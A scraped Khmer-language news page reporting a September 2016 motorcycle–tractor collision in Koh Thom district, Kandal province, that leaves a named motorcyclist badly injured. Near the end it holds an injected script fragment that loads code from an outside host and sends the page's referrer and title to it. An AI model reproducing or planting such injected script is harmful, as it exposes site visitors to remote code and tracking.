របួសធ្ងន់បញ្ជូនបុរសម្នាក់ទៅមន្ទីរពេទ្យប្រទេសវៀតណាមភ្លាមៗ ខណ:ជួបគ្រោះថ្នាក់ចរាចរណ៏

កណ្តាល៖ បុរសម្នាក់រងរបួសធ្ងន់ក្នុងគ្រោះថ្នាក់ចរាចរណ៍ផ្លូវគោករវាង ម៉ូតូ និងគោយន្តកន្ត្រៃ កាលពីវេលាម៉ោង១០និង២៥នាទីរសៀលថ្ងៃទី២២ខែកញ្ញាឆ្នាំ២០១៦នេះផ្លូវជាតិលេខ២១ ចំណុចបង្គោលភ្លើងNR 263 ស្ថិតនៅក្នុងភូមិព្រែកប្រធាតុ.ឃុំព្រែកស្ដី.ស្រុកកោះធំ ខេត្តកណ្តាល។

សមត្ថកិច្ចបានអោយដឹងថាជនរងគ្រោះមានឈ្មោះ ឆឺយ សា រ៉េត ភេទប្រុស អាយុ៣១ឆ្នាំ (ជាមនុស្ស គ ថ្លង់ )មុខរបរកសិករ មានទីលំនៅៗ ភូមិពោធិរាម្មា.ឃុំព្រែកស្តី ស្រុកកោះធំ បើកបរ ម៉ូតូម៉ាកហុងដាC90 ពណ៌ ខៀវចាស់ ពាក់ផ្លាកលេខ ភ្នំពេញ 1AL-4852 ម៉ូតូមានកញ្ចក់ អ្នកបើបរ អត់ពាក់មួកសុវត្ថិភាព បើកបរក្នុង ទិសដៅពី ជើង ទៅ ត្បូង (តាខ្មៅ ជ្រៃធំ) រងរបួសធ្ងន់បាក់ភ្លៅខាងស្តាំ ទៅព្យាបាលនៅមន្ទីរពេទ្យប្រទេសវៀតណាម ។អ្នកបើកបរគោយន្តកន្រ្តៃឈ្មោះ កុយ ទូច ភេទប្រុសអាយុ ៣៨ ឆ្នាំ មុខរបរ ដឹកឫស្សីលក់ មានទីលំនៅៗ ភូមិពោធិត្បែង.ឃុំនិទាន.ស្រុកបរសេដ្ឋ .ខេត្តកំពង់ស្ពឺ បើកបរគោយន្តកន្រ្តៃ ម៉ាកតូតូ ពណ៌ក្រហម គ្មានស្លាកលេខបើកក្នុងទិសដៅពី ត្បូងទៅជើង (ជ្រៃធំ តាខ្មៅ ) គ្មានរបួស ។

ប្រភពដដែលបានបន្តថា អ្នកបើកបរម៉ូតូ ជាមនុស្ស គ ថ្លង់ បើកបរមានល្បឿនលឿន មានជាតិស្រវឹង មិនប្រកាន់ស្តាំ បានទៅបុក គោយន្តកន្រ្តៃ ដែលបើកបរ មានទិសដៅបញ្ច្រាស ចំពីមុខពេញទំហឹង ។

ក្រោយកើតហេតុសមត្ថកិច្ចបានចុះវាស់វែង ចំនែកជនរងគ្រោះត្រូវបានបញ្ជូនទៅសង្គ្រោះនៅមន្ទីរពេទ្យវៀតណាម ដោយឡែកមធ្យោបាយពាក់ព័ន្ធត្រូវបាន យកមករក្សារទុកនៅអធិការដ្ឋាននគរបាលស្រុកកោះធំ ដើម្បីដោះស្រាយគ្នានៅពេលក្រោយ៕

14355720_2108991089325900_2863771839520346818_n 14448987_2108991112659231_8673205758453097680_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More